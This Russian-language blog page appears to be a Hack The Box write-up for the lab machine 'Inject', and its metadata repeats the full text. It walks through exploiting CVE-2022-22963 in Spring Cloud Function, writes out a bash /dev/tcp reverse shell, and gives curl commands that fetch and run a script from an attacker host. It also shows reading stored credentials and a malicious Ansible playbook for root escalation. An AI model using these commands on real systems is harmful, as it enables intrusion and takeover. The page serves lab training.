<!DOCTYPE html>
<html lang="ru"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>HTB Writeup Inject | Raven Blog</title>
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="HTB Writeup Inject" />
<meta property="og:locale" content="ru" />
<meta name="description" content="HTB Writeup of machine “Inject” IP: 10.10.11.204 Данный WriteUp был написан давным давно, однако мне очень хочется его здесь увековечить :) Надеюсь тебе он понравится, читатель и ты найдёшь для себя что то новое! С тех пор мой личный подход слега поменялся к похеку машин, скажем так, но в данном WriteUp на мой взгляд хорошо выдержанна методология и сам подход, поэтому почему бы и не оказаться ему тут :) Анализ и сбор информации о цели Первым делом после подключения по VPN, займёмся сканированием IP адреса на предмет открытых портов и определения соответствующих портам сервисов. Так как nmap работает медленно, то опрделение открытых портов проведём с помощью утилиты rustscan - очень хороший сканер TCP портов, написанный на языке программирования Rust. Получаем следующую картину: Синтаксис rustscan следующий: сначала идут флаги и оптции, затем “–”, а затем команды. В нашем случае с помощью опции -a мы указали нужный нам ip, а с помощью опции --ulimit мы задаём максимальное колличество колличество выделяемых потоков на сканирование. С помощью команды -p- мы сканируем весь допустимый диапазон портов. В результате сканирования обнаруживаем, что открыты порты 22 и 8080. Касаемо 22 порта можем однозначно предположить что это ssh, но всё же нужно проверить. Проведём сканирование этих портов с помощью nmap: В данной утилите использвоаны следуюзие флаги: -sS - SYN сканирование (от имени администратора/суперпользователя); -sV - определние сервиса и его версии на сетевых портах; -T4 - задаём интенсивоность сканирования; -sC - применяем стандартные скрипты к портам для расширения выдаваемой информации; -p - здадаём список портов для сканирования. В результате сканирования делаем следующие выводы: на данном хосте активно два сервиса: ssh (OpenSSH 8.2p1) и 8080 (nagios-nsca). Перейдём в браузере по URI http://10.10.11.204:8080. Проанализируем используемые технологии с помощью плагина браузера wappanalyzer, однако он нам не покажет чего - либо интересного. Просканируем наличие директорий c помощью ffuf: Обзор используемых опций: -u сканируемый URL адрес, у которого FUZZ на конце показывает место, которое фаззится -fc указывает статусы ответов, которые не подлежат выводу -w указывает на путь до файла словаря, который используется для фаззинга В результате сканирования мы понимаем, что на данном сайте существует 3 URL: http://10.10.11.204:8080/blogs - обычные записи, ничего интересного; http://10.10.11.204:8080/register - стоит заглушка; http://10.10.11.204:8080/upload - интересное для нас место, которе позволяет загружать файлы. К нему мы ещё вернёмся. Получение флага “user.txt” Ранее нами был найден довольно занимательный URL адрес: http://10.10.11.204:8080/upload. Пройдя по нему мы можем загрузить картинку. Загрузив картинку нам тут же предлагают её просмотреть: Данная возможность нас должна привлечь, так как есть вероятность на возможность просмотра какого угодно файла и тем самым мы получим уязвимость Path Traversal. проверим свою гипотезу, перехватив запрос с помощью Burp Suite и исследовав его. Перехватив запрос мы видим, что имя нашего файла, который мы только что залили, передаётся в качестве аргументов. Попробуем спустится на уровень выше по файловой системе и посмотрим что у нас получится. И по итогу у нас получилось! Наша гипотеза верна и вот что мы увидим по итогу: Здесь мы так же можем видить файл или директорию (но скорее директорию) под названием java. Это означает что само веб-приложение написанно с использованием стека технологий, свойственного языку программирования java. Изучая исходные файлы мы видим это: Изучая импорты в исходниках, мы видим, что использовался Spring Framework. Этот момент поднаталкивает к мысли попробовать проэксплуатировать одну из популярнийших уязвимостей 2022 года - Spring4Shell (CVE-2022-22963). Пользуясь информацией из данного источника, узнаём, что эксплуатация происходит следующем образом: мы отправляем POST запрос на сервер по пути в URL /functionRouter с заголовком &quot;spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(&#39;&lt;RCE&gt;&#39;)&quot;, где &lt;RCE&gt; - непосредственно полезная нагрузка, которая будет выполнена bash. Так же при этом нужно отправить что либо в виде RAW DATA. Попробуем с помощью утилиты curl создать файл helloHERE.txt в директории /tmp. Результат мы сможем проверить с помощью ранее найденной Path Traversal. Вот что у нас получится: Мы успешно смогли создать файл! А значит данное веб приложение подверженно RCE и мы потенциально можем проникнуть на сервер. Суть нашего проникновения на сервер будет заключаеться в создании ReverseShell, то есть инциировании соединения от лица машины жертвы на машину атакующего с передачей атакующему командной оболочки. Наш ReverseShell будет в качетсве файла RS.sh со следующим содержимым: #!/bin/bash bash -i &gt;&amp; /dev/tcp/&lt;IP_of_attacker&gt;/&lt;port_of_dest&gt; 0&gt;&amp;1 Для формирования разного рода ReverseShell нагрузкок очень хорошо подойдёт следующий ресурс. А использование в качестве прослушивателя rlwrap -cAr nc -lvnp &lt;port&gt; позволяет сохранять историю команд. Так же всегда стоит для удобства настраивать разного рода переменные окружения для оболочки для удобства и вызывать на всякий случай через python ещё раз bash оболочку, так как в ином случае может быть что мы имеем дело с слегка ограниченной оболочкой. Такими темпами мы очень облегчим себе труды. Данная команда осуществит вызов bash в интерактивном режиме, где все стандартные потоки вывода и вывода ошибок будут перенаправленны в сетевое устройстви, которое в нашем случае будет сетевым подключением, в свою очередь от которого стандартный поток ввода будет передаваться на стандартный поток вывода. Данный ReverseShell мы поместим в директорию /tmp и выполним, при этом в свою очередь будем принимать сетевое подключение с помощью утилиты netcat и команда для этого ожидания подключения примет следующий вид: nc -nvpl 1337, где 1337 - номер порта, на который мы ожидаем получить подключение. Так же в директории, в которой у нас хранится RS.sh файл, мы поднимем http сервер, так как свой файл мы загрузим на хост атакуемого. Запуск http сервера на 80 порту произведём с помощью команды sudo python3 -m http.server 80. Дальнейние команды для отправки файла и его запуска на сервере примут следующий вид: curl -X POST http://10.10.11.204:8000/functionRouter -H &quot;spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(&#39;curl http://&lt;IP_address_of_attacker&gt;/RS.sh -o /tmp/RS.sh&#39;)&quot; --data-raw &#39;data&#39; -v curl -X POST http://10.10.11.204:8000/functionRouter -H &quot;spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(&#39;bash /tmp/RS.sh&#39;)&quot; --data-raw &#39;data&#39; -v После всех этих действий, мы попадаем в систему под учётной записью frank: Теперь перейдём в домашнюю директорию данного пользователя с помощью команды cd. В надежде увидеть файл user.txt нас ждёт облом. А это значит что непривилегированный пользователь не один в системе. Cпустимcя на уровень выше по файловой системе и обнаружим там корневую директорию пользователя phil. Перейдя в неё, мы найдём заветный файл, но само собой мы не сможем прочесть его. Но возможно мы недостаточно осмотрели свою корневую домашнюю директорию. Перейдя в неё попробуем вывести содержимое с помощью ls -a и мы обнаружим в скрытых файлах некий файл .m2. При попытки прочесть содержимое файла нам подсказывают, что это директория. Перейдя в неё, находим файл settings.xml. Прочитав его, узнаем учётные данные пользователя phil: Авторизуемся как phil с помощью su phil, а затем введём bash -i для получения интерактивной оболочки. Переместимся в его домашнюю директорию и заберём флаг! Получение флага “root.txt” Есть несколько способов повысить свои привелегии в системе до прав root пользователя. Можно с помощью sudo -l узнать, на выполнение каких привилегированных команд у нас есть права или же и вовсе найти файлы с установленным SUID битом с помощью find / -perm -u=s -type f 2&gt;/dev/null и тем самым найти какой либо недочёт в разграничении прав доступа (к примеру используя GTFO), но не один из этих способов ни к чему не привёл. Тогда мы можем заметить в корневой директории каталог /opt, в котором обычно устанавливается дополнительное программное обеспечение. Перейдём в него и поищем что - нибудь интересное. По пути /opt/automation/tasks/ находим файл playbook_1.yml. Прочитав его, понимаем, что это конфигурационный файл для ansible - система управления конфигруациями. Данная система работает с правами root. Для компрометации системы принимаем решение написать вредоносную конфигурацию, который установил бы SUID бит у оболочки bash. Изучая особенности данной технологии и опираясь на источник, содаём вредоносный yml файл, который назовём evil_root.yml со следующим содержимым: - hosts: localhost tasks: - name: EvilRoot ansible.builtin.shell: chmod +s /bin/bash become: true Так же в результате проведения эксперимента выяснилось, что в /opt/automation/tasks/ мы можем копировать файлы, хотя создовать само собой не можем, так как недостаточно прав доступа. Доставим этот файл в директорию /tmp, а оттуда скопируем данный файл в /opt/automation/tasks/ и будем ждать, когда произойдёт считывание конфигураций и выполнение нашей полезной нагрузки. Затем вводим bash -p для запуска bash с привилегированными правами. В результате чего мы получаем необходимые права и забираем наш флаг! На этом машина полностью под нашим контролем и это прекрасно!" />
<meta property="og:description" content="HTB Writeup of machine “Inject” IP: 10.10.11.204 Данный WriteUp был написан давным давно, однако мне очень хочется его здесь увековечить :) Надеюсь тебе он понравится, читатель и ты найдёшь для себя что то новое! С тех пор мой личный подход слега поменялся к похеку машин, скажем так, но в данном WriteUp на мой взгляд хорошо выдержанна методология и сам подход, поэтому почему бы и не оказаться ему тут :) Анализ и сбор информации о цели Первым делом после подключения по VPN, займёмся сканированием IP адреса на предмет открытых портов и определения соответствующих портам сервисов. Так как nmap работает медленно, то опрделение открытых портов проведём с помощью утилиты rustscan - очень хороший сканер TCP портов, написанный на языке программирования Rust. Получаем следующую картину: Синтаксис rustscan следующий: сначала идут флаги и оптции, затем “–”, а затем команды. В нашем случае с помощью опции -a мы указали нужный нам ip, а с помощью опции --ulimit мы задаём максимальное колличество колличество выделяемых потоков на сканирование. С помощью команды -p- мы сканируем весь допустимый диапазон портов. В результате сканирования обнаруживаем, что открыты порты 22 и 8080. Касаемо 22 порта можем однозначно предположить что это ssh, но всё же нужно проверить. Проведём сканирование этих портов с помощью nmap: В данной утилите использвоаны следуюзие флаги: -sS - SYN сканирование (от имени администратора/суперпользователя); -sV - определние сервиса и его версии на сетевых портах; -T4 - задаём интенсивоность сканирования; -sC - применяем стандартные скрипты к портам для расширения выдаваемой информации; -p - здадаём список портов для сканирования. В результате сканирования делаем следующие выводы: на данном хосте активно два сервиса: ssh (OpenSSH 8.2p1) и 8080 (nagios-nsca). Перейдём в браузере по URI http://10.10.11.204:8080. Проанализируем используемые технологии с помощью плагина браузера wappanalyzer, однако он нам не покажет чего - либо интересного. Просканируем наличие директорий c помощью ffuf: Обзор используемых опций: -u сканируемый URL адрес, у которого FUZZ на конце показывает место, которое фаззится -fc указывает статусы ответов, которые не подлежат выводу -w указывает на путь до файла словаря, который используется для фаззинга В результате сканирования мы понимаем, что на данном сайте существует 3 URL: http://10.10.11.204:8080/blogs - обычные записи, ничего интересного; http://10.10.11.204:8080/register - стоит заглушка; http://10.10.11.204:8080/upload - интересное для нас место, которе позволяет загружать файлы. К нему мы ещё вернёмся. Получение флага “user.txt” Ранее нами был найден довольно занимательный URL адрес: http://10.10.11.204:8080/upload. Пройдя по нему мы можем загрузить картинку. Загрузив картинку нам тут же предлагают её просмотреть: Данная возможность нас должна привлечь, так как есть вероятность на возможность просмотра какого угодно файла и тем самым мы получим уязвимость Path Traversal. проверим свою гипотезу, перехватив запрос с помощью Burp Suite и исследовав его. Перехватив запрос мы видим, что имя нашего файла, который мы только что залили, передаётся в качестве аргументов. Попробуем спустится на уровень выше по файловой системе и посмотрим что у нас получится. И по итогу у нас получилось! Наша гипотеза верна и вот что мы увидим по итогу: Здесь мы так же можем видить файл или директорию (но скорее директорию) под названием java. Это означает что само веб-приложение написанно с использованием стека технологий, свойственного языку программирования java. Изучая исходные файлы мы видим это: Изучая импорты в исходниках, мы видим, что использовался Spring Framework. Этот момент поднаталкивает к мысли попробовать проэксплуатировать одну из популярнийших уязвимостей 2022 года - Spring4Shell (CVE-2022-22963). Пользуясь информацией из данного источника, узнаём, что эксплуатация происходит следующем образом: мы отправляем POST запрос на сервер по пути в URL /functionRouter с заголовком &quot;spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(&#39;&lt;RCE&gt;&#39;)&quot;, где &lt;RCE&gt; - непосредственно полезная нагрузка, которая будет выполнена bash. Так же при этом нужно отправить что либо в виде RAW DATA. Попробуем с помощью утилиты curl создать файл helloHERE.txt в директории /tmp. Результат мы сможем проверить с помощью ранее найденной Path Traversal. Вот что у нас получится: Мы успешно смогли создать файл! А значит данное веб приложение подверженно RCE и мы потенциально можем проникнуть на сервер. Суть нашего проникновения на сервер будет заключаеться в создании ReverseShell, то есть инциировании соединения от лица машины жертвы на машину атакующего с передачей атакующему командной оболочки. Наш ReverseShell будет в качетсве файла RS.sh со следующим содержимым: #!/bin/bash bash -i &gt;&amp; /dev/tcp/&lt;IP_of_attacker&gt;/&lt;port_of_dest&gt; 0&gt;&amp;1 Для формирования разного рода ReverseShell нагрузкок очень хорошо подойдёт следующий ресурс. А использование в качестве прослушивателя rlwrap -cAr nc -lvnp &lt;port&gt; позволяет сохранять историю команд. Так же всегда стоит для удобства настраивать разного рода переменные окружения для оболочки для удобства и вызывать на всякий случай через python ещё раз bash оболочку, так как в ином случае может быть что мы имеем дело с слегка ограниченной оболочкой. Такими темпами мы очень облегчим себе труды. Данная команда осуществит вызов bash в интерактивном режиме, где все стандартные потоки вывода и вывода ошибок будут перенаправленны в сетевое устройстви, которое в нашем случае будет сетевым подключением, в свою очередь от которого стандартный поток ввода будет передаваться на стандартный поток вывода. Данный ReverseShell мы поместим в директорию /tmp и выполним, при этом в свою очередь будем принимать сетевое подключение с помощью утилиты netcat и команда для этого ожидания подключения примет следующий вид: nc -nvpl 1337, где 1337 - номер порта, на который мы ожидаем получить подключение. Так же в директории, в которой у нас хранится RS.sh файл, мы поднимем http сервер, так как свой файл мы загрузим на хост атакуемого. Запуск http сервера на 80 порту произведём с помощью команды sudo python3 -m http.server 80. Дальнейние команды для отправки файла и его запуска на сервере примут следующий вид: curl -X POST http://10.10.11.204:8000/functionRouter -H &quot;spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(&#39;curl http://&lt;IP_address_of_attacker&gt;/RS.sh -o /tmp/RS.sh&#39;)&quot; --data-raw &#39;data&#39; -v curl -X POST http://10.10.11.204:8000/functionRouter -H &quot;spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(&#39;bash /tmp/RS.sh&#39;)&quot; --data-raw &#39;data&#39; -v После всех этих действий, мы попадаем в систему под учётной записью frank: Теперь перейдём в домашнюю директорию данного пользователя с помощью команды cd. В надежде увидеть файл user.txt нас ждёт облом. А это значит что непривилегированный пользователь не один в системе. Cпустимcя на уровень выше по файловой системе и обнаружим там корневую директорию пользователя phil. Перейдя в неё, мы найдём заветный файл, но само собой мы не сможем прочесть его. Но возможно мы недостаточно осмотрели свою корневую домашнюю директорию. Перейдя в неё попробуем вывести содержимое с помощью ls -a и мы обнаружим в скрытых файлах некий файл .m2. При попытки прочесть содержимое файла нам подсказывают, что это директория. Перейдя в неё, находим файл settings.xml. Прочитав его, узнаем учётные данные пользователя phil: Авторизуемся как phil с помощью su phil, а затем введём bash -i для получения интерактивной оболочки. Переместимся в его домашнюю директорию и заберём флаг! Получение флага “root.txt” Есть несколько способов повысить свои привелегии в системе до прав root пользователя. Можно с помощью sudo -l узнать, на выполнение каких привилегированных команд у нас есть права или же и вовсе найти файлы с установленным SUID битом с помощью find / -perm -u=s -type f 2&gt;/dev/null и тем самым найти какой либо недочёт в разграничении прав доступа (к примеру используя GTFO), но не один из этих способов ни к чему не привёл. Тогда мы можем заметить в корневой директории каталог /opt, в котором обычно устанавливается дополнительное программное обеспечение. Перейдём в него и поищем что - нибудь интересное. По пути /opt/automation/tasks/ находим файл playbook_1.yml. Прочитав его, понимаем, что это конфигурационный файл для ansible - система управления конфигруациями. Данная система работает с правами root. Для компрометации системы принимаем решение написать вредоносную конфигурацию, который установил бы SUID бит у оболочки bash. Изучая особенности данной технологии и опираясь на источник, содаём вредоносный yml файл, который назовём evil_root.yml со следующим содержимым: - hosts: localhost tasks: - name: EvilRoot ansible.builtin.shell: chmod +s /bin/bash become: true Так же в результате проведения эксперимента выяснилось, что в /opt/automation/tasks/ мы можем копировать файлы, хотя создовать само собой не можем, так как недостаточно прав доступа. Доставим этот файл в директорию /tmp, а оттуда скопируем данный файл в /opt/automation/tasks/ и будем ждать, когда произойдёт считывание конфигураций и выполнение нашей полезной нагрузки. Затем вводим bash -p для запуска bash с привилегированными правами. В результате чего мы получаем необходимые права и забираем наш флаг! На этом машина полностью под нашим контролем и это прекрасно!" />
<link rel="canonical" href="http://localhost:4000/writeups/2025/04/30/HTB-Inject.html" />
<meta property="og:url" content="http://localhost:4000/writeups/2025/04/30/HTB-Inject.html" />
<meta property="og:site_name" content="Raven Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-04-30T17:07:12+03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="HTB Writeup Inject" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-04-30T17:07:12+03:00","datePublished":"2025-04-30T17:07:12+03:00","description":"HTB Writeup of machine “Inject” IP: 10.10.11.204 Данный WriteUp был написан давным давно, однако мне очень хочется его здесь увековечить :) Надеюсь тебе он понравится, читатель и ты найдёшь для себя что то новое! С тех пор мой личный подход слега поменялся к похеку машин, скажем так, но в данном WriteUp на мой взгляд хорошо выдержанна методология и сам подход, поэтому почему бы и не оказаться ему тут :) Анализ и сбор информации о цели Первым делом после подключения по VPN, займёмся сканированием IP адреса на предмет открытых портов и определения соответствующих портам сервисов. Так как nmap работает медленно, то опрделение открытых портов проведём с помощью утилиты rustscan - очень хороший сканер TCP портов, написанный на языке программирования Rust. Получаем следующую картину: Синтаксис rustscan следующий: сначала идут флаги и оптции, затем “–”, а затем команды. В нашем случае с помощью опции -a мы указали нужный нам ip, а с помощью опции --ulimit мы задаём максимальное колличество колличество выделяемых потоков на сканирование. С помощью команды -p- мы сканируем весь допустимый диапазон портов. В результате сканирования обнаруживаем, что открыты порты 22 и 8080. Касаемо 22 порта можем однозначно предположить что это ssh, но всё же нужно проверить. Проведём сканирование этих портов с помощью nmap: В данной утилите использвоаны следуюзие флаги: -sS - SYN сканирование (от имени администратора/суперпользователя); -sV - определние сервиса и его версии на сетевых портах; -T4 - задаём интенсивоность сканирования; -sC - применяем стандартные скрипты к портам для расширения выдаваемой информации; -p - здадаём список портов для сканирования. В результате сканирования делаем следующие выводы: на данном хосте активно два сервиса: ssh (OpenSSH 8.2p1) и 8080 (nagios-nsca). Перейдём в браузере по URI http://10.10.11.204:8080. Проанализируем используемые технологии с помощью плагина браузера wappanalyzer, однако он нам не покажет чего - либо интересного. Просканируем наличие директорий c помощью ffuf: Обзор используемых опций: -u сканируемый URL адрес, у которого FUZZ на конце показывает место, которое фаззится -fc указывает статусы ответов, которые не подлежат выводу -w указывает на путь до файла словаря, который используется для фаззинга В результате сканирования мы понимаем, что на данном сайте существует 3 URL: http://10.10.11.204:8080/blogs - обычные записи, ничего интересного; http://10.10.11.204:8080/register - стоит заглушка; http://10.10.11.204:8080/upload - интересное для нас место, которе позволяет загружать файлы. К нему мы ещё вернёмся. Получение флага “user.txt” Ранее нами был найден довольно занимательный URL адрес: http://10.10.11.204:8080/upload. Пройдя по нему мы можем загрузить картинку. Загрузив картинку нам тут же предлагают её просмотреть: Данная возможность нас должна привлечь, так как есть вероятность на возможность просмотра какого угодно файла и тем самым мы получим уязвимость Path Traversal. проверим свою гипотезу, перехватив запрос с помощью Burp Suite и исследовав его. Перехватив запрос мы видим, что имя нашего файла, который мы только что залили, передаётся в качестве аргументов. Попробуем спустится на уровень выше по файловой системе и посмотрим что у нас получится. И по итогу у нас получилось! Наша гипотеза верна и вот что мы увидим по итогу: Здесь мы так же можем видить файл или директорию (но скорее директорию) под названием java. Это означает что само веб-приложение написанно с использованием стека технологий, свойственного языку программирования java. Изучая исходные файлы мы видим это: Изучая импорты в исходниках, мы видим, что использовался Spring Framework. Этот момент поднаталкивает к мысли попробовать проэксплуатировать одну из популярнийших уязвимостей 2022 года - Spring4Shell (CVE-2022-22963). Пользуясь информацией из данного источника, узнаём, что эксплуатация происходит следующем образом: мы отправляем POST запрос на сервер по пути в URL /functionRouter с заголовком &quot;spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(&#39;&lt;RCE&gt;&#39;)&quot;, где &lt;RCE&gt; - непосредственно полезная нагрузка, которая будет выполнена bash. Так же при этом нужно отправить что либо в виде RAW DATA. Попробуем с помощью утилиты curl создать файл helloHERE.txt в директории /tmp. Результат мы сможем проверить с помощью ранее найденной Path Traversal. Вот что у нас получится: Мы успешно смогли создать файл! А значит данное веб приложение подверженно RCE и мы потенциально можем проникнуть на сервер. Суть нашего проникновения на сервер будет заключаеться в создании ReverseShell, то есть инциировании соединения от лица машины жертвы на машину атакующего с передачей атакующему командной оболочки. Наш ReverseShell будет в качетсве файла RS.sh со следующим содержимым: #!/bin/bash bash -i &gt;&amp; /dev/tcp/&lt;IP_of_attacker&gt;/&lt;port_of_dest&gt; 0&gt;&amp;1 Для формирования разного рода ReverseShell нагрузкок очень хорошо подойдёт следующий ресурс. А использование в качестве прослушивателя rlwrap -cAr nc -lvnp &lt;port&gt; позволяет сохранять историю команд. Так же всегда стоит для удобства настраивать разного рода переменные окружения для оболочки для удобства и вызывать на всякий случай через python ещё раз bash оболочку, так как в ином случае может быть что мы имеем дело с слегка ограниченной оболочкой. Такими темпами мы очень облегчим себе труды. Данная команда осуществит вызов bash в интерактивном режиме, где все стандартные потоки вывода и вывода ошибок будут перенаправленны в сетевое устройстви, которое в нашем случае будет сетевым подключением, в свою очередь от которого стандартный поток ввода будет передаваться на стандартный поток вывода. Данный ReverseShell мы поместим в директорию /tmp и выполним, при этом в свою очередь будем принимать сетевое подключение с помощью утилиты netcat и команда для этого ожидания подключения примет следующий вид: nc -nvpl 1337, где 1337 - номер порта, на который мы ожидаем получить подключение. Так же в директории, в которой у нас хранится RS.sh файл, мы поднимем http сервер, так как свой файл мы загрузим на хост атакуемого. Запуск http сервера на 80 порту произведём с помощью команды sudo python3 -m http.server 80. Дальнейние команды для отправки файла и его запуска на сервере примут следующий вид: curl -X POST http://10.10.11.204:8000/functionRouter -H &quot;spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(&#39;curl http://&lt;IP_address_of_attacker&gt;/RS.sh -o /tmp/RS.sh&#39;)&quot; --data-raw &#39;data&#39; -v curl -X POST http://10.10.11.204:8000/functionRouter -H &quot;spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(&#39;bash /tmp/RS.sh&#39;)&quot; --data-raw &#39;data&#39; -v После всех этих действий, мы попадаем в систему под учётной записью frank: Теперь перейдём в домашнюю директорию данного пользователя с помощью команды cd. В надежде увидеть файл user.txt нас ждёт облом. А это значит что непривилегированный пользователь не один в системе. Cпустимcя на уровень выше по файловой системе и обнаружим там корневую директорию пользователя phil. Перейдя в неё, мы найдём заветный файл, но само собой мы не сможем прочесть его. Но возможно мы недостаточно осмотрели свою корневую домашнюю директорию. Перейдя в неё попробуем вывести содержимое с помощью ls -a и мы обнаружим в скрытых файлах некий файл .m2. При попытки прочесть содержимое файла нам подсказывают, что это директория. Перейдя в неё, находим файл settings.xml. Прочитав его, узнаем учётные данные пользователя phil: Авторизуемся как phil с помощью su phil, а затем введём bash -i для получения интерактивной оболочки. Переместимся в его домашнюю директорию и заберём флаг! Получение флага “root.txt” Есть несколько способов повысить свои привелегии в системе до прав root пользователя. Можно с помощью sudo -l узнать, на выполнение каких привилегированных команд у нас есть права или же и вовсе найти файлы с установленным SUID битом с помощью find / -perm -u=s -type f 2&gt;/dev/null и тем самым найти какой либо недочёт в разграничении прав доступа (к примеру используя GTFO), но не один из этих способов ни к чему не привёл. Тогда мы можем заметить в корневой директории каталог /opt, в котором обычно устанавливается дополнительное программное обеспечение. Перейдём в него и поищем что - нибудь интересное. По пути /opt/automation/tasks/ находим файл playbook_1.yml. Прочитав его, понимаем, что это конфигурационный файл для ansible - система управления конфигруациями. Данная система работает с правами root. Для компрометации системы принимаем решение написать вредоносную конфигурацию, который установил бы SUID бит у оболочки bash. Изучая особенности данной технологии и опираясь на источник, содаём вредоносный yml файл, который назовём evil_root.yml со следующим содержимым: - hosts: localhost tasks: - name: EvilRoot ansible.builtin.shell: chmod +s /bin/bash become: true Так же в результате проведения эксперимента выяснилось, что в /opt/automation/tasks/ мы можем копировать файлы, хотя создовать само собой не можем, так как недостаточно прав доступа. Доставим этот файл в директорию /tmp, а оттуда скопируем данный файл в /opt/automation/tasks/ и будем ждать, когда произойдёт считывание конфигураций и выполнение нашей полезной нагрузки. Затем вводим bash -p для запуска bash с привилегированными правами. В результате чего мы получаем необходимые права и забираем наш флаг! На этом машина полностью под нашим контролем и это прекрасно!","headline":"HTB Writeup Inject","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/writeups/2025/04/30/HTB-Inject.html"},"url":"http://localhost:4000/writeups/2025/04/30/HTB-Inject.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/main.css"><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Raven Blog" /></head>
<body><header class="site-header" role="banner">

  <div class="wrapper"><a class="site-title" rel="author" href="/">Raven Blog</a><nav class="site-nav">
        <input type="checkbox" id="nav-trigger" class="nav-trigger" />
        <label for="nav-trigger">
          <span class="menu-icon">
            <svg viewBox="0 0 18 15" width="18px" height="15px">
              <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"/>
            </svg>
          </span>
        </label>

        <div class="trigger"><a class="page-link" href="/about/">About</a></div>
      </nav></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">HTB Writeup Inject</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2025-04-30T17:07:12+03:00" itemprop="datePublished">Apr 30, 2025
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <h1 id="htb-writeup-of-machine-inject">HTB Writeup of machine “Inject”</h1>

<p><img src="/assets/images/HTB_writeup_Inject/Inject.png" alt="Inject" />
<em>IP: 10.10.11.204</em></p>

<blockquote>
  <p>Данный WriteUp был написан давным давно, однако мне очень хочется его здесь увековечить :) Надеюсь тебе он понравится, читатель и ты найдёшь для себя что то новое! С тех пор мой личный подход слега поменялся к похеку машин, скажем так, но в данном WriteUp на мой взгляд хорошо выдержанна методология и сам подход, поэтому почему бы и не оказаться ему тут :)</p>
</blockquote>

<h2 id="анализ-и-сбор-информации-о-цели">Анализ и сбор информации о цели</h2>
<p>Первым делом после подключения по VPN, займёмся сканированием IP адреса на предмет открытых портов и определения соответствующих портам сервисов.</p>

<p>Так как nmap работает медленно, то опрделение открытых портов проведём с помощью утилиты <a href="https://github.com/RustScan/RustScan">rustscan</a> - очень хороший сканер <code class="language-plaintext highlighter-rouge">TCP портов</code>, написанный на языке программирования <code class="language-plaintext highlighter-rouge">Rust</code>.</p>

<p>Получаем следующую картину:
<img src="/assets/images/HTB_writeup_Inject/1.png" alt="rustscan" /></p>

<p>Синтаксис <code class="language-plaintext highlighter-rouge">rustscan</code> следующий: сначала идут флаги и оптции, затем “–”, а затем команды. В нашем случае с помощью опции <code class="language-plaintext highlighter-rouge">-a</code> мы указали нужный нам ip, а с помощью опции <code class="language-plaintext highlighter-rouge">--ulimit</code> мы задаём максимальное колличество колличество выделяемых потоков на сканирование. С помощью команды <code class="language-plaintext highlighter-rouge">-p-</code> мы сканируем весь допустимый диапазон портов.</p>

<p>В результате сканирования обнаруживаем, что открыты порты 22 и 8080. Касаемо 22 порта можем однозначно предположить что это ssh, но всё же нужно проверить.</p>

<p>Проведём сканирование этих портов с помощью <a href="https://nmap.org/download.html">nmap</a>:
<img src="/assets/images/HTB_writeup_Inject/2.png" alt="nmap" /></p>

<p>В данной утилите использвоаны следуюзие флаги:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">-sS</code> - SYN сканирование (от имени администратора/суперпользователя);</li>
  <li><code class="language-plaintext highlighter-rouge">-sV</code> - определние сервиса и его версии на сетевых портах;</li>
  <li><code class="language-plaintext highlighter-rouge">-T4</code> - задаём интенсивоность сканирования;</li>
  <li><code class="language-plaintext highlighter-rouge">-sC</code> - применяем стандартные скрипты к портам для расширения выдаваемой информации;</li>
  <li><code class="language-plaintext highlighter-rouge">-p</code> - здадаём список портов для сканирования.</li>
</ul>

<p>В результате сканирования делаем следующие выводы: на данном хосте активно два сервиса: ssh (OpenSSH 8.2p1) и 8080 (nagios-nsca).</p>

<p>Перейдём в браузере по URI <code class="language-plaintext highlighter-rouge">http://10.10.11.204:8080</code>. Проанализируем используемые технологии с помощью плагина браузера <a href="https://www.wappalyzer.com/">wappanalyzer</a>, однако он нам не покажет чего - либо интересного.</p>

<p>Просканируем наличие директорий c помощью <a href="https://github.com/ffuf/ffuf">ffuf</a>:
<img src="/assets/images/HTB_writeup_Inject/3.png" alt="ffuf" />
Обзор используемых опций:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">-u</code> сканируемый URL адрес, у которого FUZZ на конце показывает место, которое фаззится</li>
  <li><code class="language-plaintext highlighter-rouge">-fc</code> указывает статусы ответов, которые не подлежат выводу</li>
  <li><code class="language-plaintext highlighter-rouge">-w</code> указывает на путь до файла словаря, который используется для фаззинга</li>
</ul>

<p>В результате сканирования мы понимаем, что на данном сайте существует 3 URL:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">http://10.10.11.204:8080/blogs</code> - обычные записи, ничего интересного;</li>
